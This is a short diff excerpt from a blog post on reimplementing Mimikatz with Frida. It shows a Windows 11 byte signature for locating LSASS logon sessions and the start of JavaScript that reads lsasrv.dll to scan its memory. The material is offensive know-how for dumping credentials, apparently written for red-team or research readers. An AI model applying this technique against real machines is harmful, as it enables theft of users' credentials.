ofasgard/CalzoneBlog/blogs/mimikatz-frida-part-2.md

 BYTE PTRN_WN11_LogonSessionList[]	= {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 ```

-We can use these precompiled signatures in our own code, although we could also deduce them ourselves using a debugger such as IDA or WinDBG if we needed to.
+We can use these precompiled signatures in our own code, although we could also deduce them ourselves with a little reverse engineering and a debugger such as IDA or WinDBG.
 All we need is a way to scan memory for a specific sequence of bytes, which happily Frida provides for us:

 ```javascript
 var lsasrv = Process.getModuleByName("lsasrv.dll")